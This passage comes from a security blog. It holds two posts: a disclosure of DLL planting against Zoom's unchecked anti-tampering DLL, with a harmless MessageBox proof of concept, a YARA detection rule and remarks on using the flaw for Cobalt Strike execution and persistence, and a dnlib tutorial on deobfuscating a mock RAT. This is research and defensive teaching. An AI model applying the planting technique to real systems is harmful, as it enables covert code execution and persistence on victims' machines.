  6. We can now inject any DLL we want.

I’ve created a simple PoC (basic CreateRemoteThread DLL injection, nothing fancy) for unloading the anti-tampering DLL and injecting our own. You can contact me at [email protected] if you want to see it.

Anti-tampering DLL can be replaced on disk

When loading the DLL, Zoom does not check the signature or the integrity of the file. I’m not sure why this is not checked at all, considering all of the checks which are done in the DllSafeCheck DLL regarding executable signature verification. This remains a mystery. A threat actor could leverage this to enable their unsigned, non-Zoom DLL to be loaded into the context of a signed executable as a host for their malicious code.

The folder which Zoom resides in is writeable, which also contributes to this attack.

A simple DLL named DllSafeCheck.dll can be compiled implementing the HackCheck export. For clarity, the malicious DLL which is used is not signed. We can see the result of querying the executable signature below.

PS AppData\Roaming\Zoom\bin_00> Get-AuthenticodeSignature DllSafeCheck.dll

SignerCertificate                         Status                                 Path
-----------------                         ------                                 ----
                                          NotSigned                              DllSafeCheck.dll

The following code was used for this PoC:

VOID __declspec(dllexport) HackCheck()
{
	// Wide-character strings, so call the W variant explicitly
	MessageBoxW(NULL, L"LloydLabs", L"Oops!", MB_APPLMODAL);
}

Here, we can see the alert when loading Zoom.

How could a threat actor realistically exploit this?

A malicious DLL could be bundled with Zoom, and sent to a victim - this would result in the payload (e.g. Cobalt Strike) being executed under the context of the Zoom process. A threat actor could also abuse these issues to persist both across reboots and in memory on a target system; this is a much cleaner approach compared to the alternative of registering some startup event.

YARA rule

import "pe"
rule Zoom_Plant {
    meta:
        date = "2020-04-03"
        author = "LloydLabs"
        url = "https://blog.syscall.party"
	
    condition:
        pe.characteristics & pe.DLL and pe.exports("HackCheck") and pe.number_of_exports == 1 and (pe.issuer contains "Zoom Video Communications, Inc.")
}

Conclusion

Thank you for reading this brief blog, if you wish to contact me I can be emailed at: [email protected] - I’m a 3rd year undergraduate student, and open to opportunities and collaboration. Cheers!

zoom re ida

18 Nov 2019

Introduction

When a threat actor wishes to circumvent analysis from a reverse engineering standpoint, a common technique is to obfuscate their malicious code. This can be done in several ways and may include control flow obfuscation (making the flow of the program confusing, random jumps..), string obfuscation (not having text in plain sight, may be encrypted, encoded..), junk code (pointless code which does nothing, merely a way to confuse analysts), and object renaming (renaming objects within the code from their original, e.g. MainService may become OQuXiqmXq throughout the code). To get around this, you can create your own tooling to deobfuscate binaries and strip them of these circumventions automatically. This is easier to achieve when managed code is involved, as managed executables are typically much more comfortable to manipulate: for .NET we’ve got dnlib, and for Java, we have ASM.

The abovementioned libraries make it much easier to manipulate and change executables, in this post we’ll be writing a simple .NET deobfuscator using dnlib against a prolific RAT (“Remote Administration Tool”) - this can easily be extended and changed to suit your needs based on the challenges you face with a specific managed executable. I have mimicked the protections which we’d see in this RAT for the purpose of this writeup.

By the end of this, we’ll have a working deobfuscator which will strip some of the protections that the attacker has applied to the .NET assembly.

The steps we’ll take

Everyone loves diagrams, right? This is a basic breakdown of the process we’ll take to achieve deobfuscation.

Initial static code analysis

Taking a look at the executable, it employs an extremely basic class and method obfuscation technique: a randomly generated 14 character string is prepended to all of the declarations. The strings are obfuscated strangely too. Each one has a ‘|’ character followed by that same string appended to it, and is split on the ‘|’ at runtime to recover the original text - so we’ll have to do some instruction patching to get rid of this and split it ourselves. You can download the executable from here that we’re going to use as an example - please note, it’s just full of useless code.

Using dnSpy, we can easily open the binary and recover the source code from the .NET assembly. If you’ve not already got dnSpy, you can get it from here. Opening it in dnSpy, we see the following structure:

As previously mentioned, I’ve created the scenario where the module name is prepended as a means of obfuscation. Looking at one of these classes deeper, we can see the other obfuscation techniques that were mentioned:

We can see all of the methods within the above class have the string prepended to them, along with the strings within the binary being split by the | character.

Writing the deobfuscator

You’ll need to install dnlib. The easiest way to achieve this is using NuGet, which is built into Visual Studio (Projects -> Add Nuget Package -> Browse). We’ll create a Console Application, using C# as our language of choice, and create a basic skeleton in which a user can pass in an input assembly and an output path.

Our basic process is going to be:

  • Grab the encoded string based on the PE timestamp
  • Rename all of the classes back to their original
  • Rename all of the methods within the classes back to their original names
  • Strip the ‘|’ string splitting from the method bodies

Let’s start by creating a new console C# project in Visual Studio, import the namespaces we need, and make a basic boilerplate for passing in two arguments. The first argument is the executable we want to deobfuscate, and the second is the path we want to output to.

using System;
using dnlib.DotNet;
using dnlib.DotNet.Emit;
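The argument handling could look something like the sketch below. It is only a minimal example: the class and method names (DeobfuscatorArgs, TryParse) are placeholders made up for illustration, and it assumes we simply want to bail out when the input file is missing.

```csharp
using System;
using System.IO;

public static class DeobfuscatorArgs
{
    // Hypothetical helper (not part of dnlib): validates the two command-line
    // arguments. Returns true and sets fullPath/outPath when both are usable.
    public static bool TryParse(string[] args, out string fullPath, out string outPath)
    {
        fullPath = null;
        outPath = null;

        // we expect exactly: <input assembly> <output path>
        if (args == null || args.Length != 2)
        {
            Console.Error.WriteLine("usage: deobfuscator <input assembly> <output path>");
            return false;
        }

        // no point going further if there's nothing to load
        if (!File.Exists(args[0]))
        {
            Console.Error.WriteLine("input assembly not found: " + args[0]);
            return false;
        }

        fullPath = Path.GetFullPath(args[0]);
        outPath = args[1];
        return true;
    }
}
```

Main would call TryParse first and return early when it reports false, then hand fullPath to the loading code and outPath to the final write.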

Next, let’s get to using dnlib. We’ll pass the path to our executable to dnlib and attempt to load it as a module, where fullPath is the variable holding the path to the executable. As seen in the initial static analysis stage, the module name is AfmAcgnNGYtN9H, so we’ll grab the assembly name at the same time.

var module = ModuleDefMd.Load(fullPath);
if (module == null)
{
    return;
}

string moduleName = module.Assembly.Name;

We can then call GetTypes to get a collection of all of the types that exist in the module, including nested ones. Each type in turn exposes its methods, and each method its body. As we saw in the static analysis of the executable, all of the classes and methods had the unique string prepended to them, along with the string obfuscation being present within some of these methods. We’ll start by simply renaming all of the types and their methods back to their original, human-readable names.

What’s beautiful about dnlib is that it’ll automatically rename the method across the entire assembly, so we don’t need to cross-reference calls to it and manually change everything.

foreach (var type in module.GetTypes())
{
    if (type.Name.Contains(moduleName)) // does our type name contain the bad string?
    {
        type.Name = type.Name.Replace(moduleName, string.Empty); // replace with nothing
    }
    ...

After this, all of the methods will now be renamed like so:

AfmAcgnNGYtN9HGetCount -> GetCount
AfmAcgnNGYtN9HBadServer -> BadServer
..and so on

That part was relatively easy, right? Let’s move on to removing the string obfuscation which is contained within the binary. As mentioned above, all of the obfuscation when it comes to strings looks like this:

string realString = "Hello world!|AfmAcgnNGYtN9H".Split('|')[0];
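Before touching any IL, it helps to pin down the string logic on its own. The sketch below is a plain C# helper with no dnlib involved. The names StringRecovery and Recover are made up for this example, and it assumes the marker always sits at the very end of the literal, after a ‘|’.

```csharp
using System;

public static class StringRecovery
{
    // Hypothetical helper: returns the text the program would see at runtime
    // if value ends with "|" + marker, otherwise null (not an obfuscated string).
    public static string Recover(string value, string marker)
    {
        if (string.IsNullOrEmpty(value) || string.IsNullOrEmpty(marker))
        {
            return null;
        }

        // the garbage we expect at the end of every obfuscated literal
        string suffix = "|" + marker;
        if (!value.EndsWith(suffix, StringComparison.Ordinal))
        {
            return null;
        }

        // mirror what the obfuscated code does at runtime: Split('|')[0]
        return value.Split('|')[0];
    }
}
```

Passing the literal above together with AfmAcgnNGYtN9H gives back Hello world!, while a string without the marker comes back as null, which is our cue to leave that instruction alone.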

We’ll need to edit the assembly manually, finding the Common Intermediate Language (“CIL”) instructions that are responsible and removing them. When a string is loaded, the ldstr OpCode is used, with its first and only operand being the string we want to load. We can look at this further in dnSpy if we select Edit IL assembly within the method body. For example, this function here:

private static string AfmAcgnNGYtN9HMalicious()
{
	return "This is a bad string|AfmAcgnNGYtN9H".Split(new char[]
	{
		'|'
	})[0];
}

Will look like this in CIL operations when we disassemble it:

We’ll want to keep the original string, which is This is a bad string - we’ll achieve this by splitting the string ourselves and NOP’ing out the rest of the string splitting. When we NOP something, we’re effectively telling the Common Language Runtime (“CLR”) to do nothing. As a resource for a complete list of instructions that are implemented, you can find them here.

We’ll want to NOP the 9 instructions that follow the ldstr instruction when we find it in the body of a method, to produce something like this:

Which, in actual code terms, produces this:

private static string AfmAcgnNGYtN9HMalicious()
{
	return "This is a bad string";
}

So, going back to writing the deobfuscator - we’ll keep the loop where we’re going through each type, but add a new loop within it. In this inner loop we’ll go through each method and check if it has a body (code), then iterate over each of the instructions within it until we find an ldstr instruction. To verify the string has been obfuscated, we’ll then check if it ends with the ‘|’ followed by the predefined string (AfmAcgnNGYtN9H), and if so remove the splitting logic.

...
foreach (var method in type.Methods)
{
    if (!method.HasBody) // does the method contain code?
    {
        continue;
    }

    var instructions = method.Body.Instructions;
    for (int i = 0; i < instructions.Count; i++)
    {
        if (instructions[i].OpCode != OpCodes.Ldstr)
        {
            continue;
        }

        string originalStr = instructions[i].Operand as string;
        if (string.IsNullOrEmpty(originalStr))
        {
            continue; // for some reason, we can't recover the string. Let's keep going.
        }

        // split by the garbage that's added ('|' followed by the module name, AfmAcgnNGYtN9H)
        string[] parts = originalStr.Split(new[] { "|" + moduleName }, StringSplitOptions.None);

        // check the garbage is there, and that the 9 splitting instructions can follow
        if (parts.Length != 2 || i + 9 >= instructions.Count)
        {
            continue;
        }

        // ok, we've found a bad string, let's swap the ldstr operand for our recovered string
        instructions[i].Operand = parts[0];

        // now, let's turn the 9 instructions after the ldstr into NOPs (in place)
        for (int j = 1; j <= 9; j++)
        {
            instructions[i + j].OpCode = OpCodes.Nop;
            instructions[i + j].Operand = null;
        }

        // skip over the instructions we've just patched
        i += 9;
    }
}
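To see the index arithmetic in isolation, here is a toy model of the patch that uses a plain list of opcode names in place of dnlib instructions. NopPatchModel and Patch are names invented for this sketch, and unlike the real loop it assumes every ldstr it meets is an obfuscated one.

```csharp
using System;
using System.Collections.Generic;

public static class NopPatchModel
{
    // Toy stand-in for a method body: each entry is just an opcode name.
    // Keeps every "ldstr" and overwrites the toNop entries after it with "nop".
    // Returns how many ldstr sites were patched.
    public static int Patch(List<string> body, int toNop = 9)
    {
        int patched = 0;
        for (int i = 0; i < body.Count; i++)
        {
            if (body[i] != "ldstr")
            {
                continue;
            }

            // make sure there really are toNop entries after the ldstr
            if (i + toNop >= body.Count)
            {
                continue;
            }

            // start at 1 so the ldstr itself is left untouched
            for (int j = 1; j <= toNop; j++)
            {
                body[i + j] = "nop";
            }

            // skip over what we've just patched
            i += toNop;
            patched++;
        }
        return patched;
    }
}
```

The point to take away is that the inner loop starts at 1 rather than 0, so the ldstr survives, and that the list never changes length, so nothing after the patched region moves.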

Finally, we’ll want to write the modified assembly back to an executable (where outPath is our path we want to write to). This will save all of our changes we’ve made.

module.Write(outPath);

We now have a deobfuscated binary. You can easily do much, much more with dnlib - I thought I’d create this for those wondering where to start.

Conclusion

The library we’re using, dnlib, is extremely powerful and easy to use. Although de4dot is extensive in its deobfuscation efforts, you may wish to take deobfuscation further yourself. Anyway, I hope you learnt something by reading this. For now, ciao!

If you’ve got any questions, feel free to email me: [email protected]

obfuscation malware re dnlib analysis